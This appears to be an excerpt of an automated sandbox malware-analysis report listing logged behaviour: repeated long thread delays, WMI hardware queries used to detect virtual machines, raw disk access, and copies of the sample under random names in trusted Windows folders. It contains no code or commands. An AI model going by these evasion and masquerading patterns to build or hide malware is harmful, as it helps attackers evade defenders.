                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 8532Thread sleep time: -30000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -600000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -599796s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6696Thread sleep time: -7200000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -598718s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -597828s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -597375s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -596468s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -595281s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -594790s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -594576s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -593531s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -591343s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -590953s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -589509s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -588812s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -588461s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -588136s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -587593s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -587350s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -587166s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -586900s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -586468s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -586174s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6696Thread sleep time: -300000s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -585871s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -584340s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -584166s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -583975s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -583656s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -583425s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -583305s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -582187s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -581949s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -581629s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -581455s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -581232s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -580961s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -580801s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -580604s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -580095s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -579637s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -579159s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -578796s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -578578s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -578328s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -577135s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -576812s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -576343s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -575968s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -575489s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -573886s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -572540s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -572203s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -571968s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -571754s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -571562s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -571234s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -571039s >= -30000s
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe TID: 6716Thread sleep time: -570920s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep count: 1024 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep count: 768 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404Thread sleep count: 937 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep count: 740 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5696Thread sleep count: 1032 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep count: 814 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4192Thread sleep count: 840 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep count: 867 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep count: 982 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304Thread sleep count: 842 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 340Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep count: 783 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8948Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 6808Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Recovery\conhost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeFile Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 30000
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 600000
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 599796
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 3600000
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 598718
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 597828
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 597375
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 596468
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 595281
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 594790
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 594576
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 593531
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 591343
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 590953
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 589509
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 588812
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 588461
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 588136
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 587593
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 587350
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 587166
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 586900
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 586468
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 586174
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 300000
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 585871
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 584340
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 584166
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 583975
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 583656
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 583425
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 583305
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 582187
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 581949
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 581629
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 581455
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 581232
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 580961
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 580801
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 580604
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 580095
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 579637
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 579159
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 578796
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 578578
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 578328
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 577135
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 576812
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 576343
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 575968
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 575489
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 573886
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 572540
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 572203
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571968
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571754
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571562
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571234
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 571039
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 570920
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
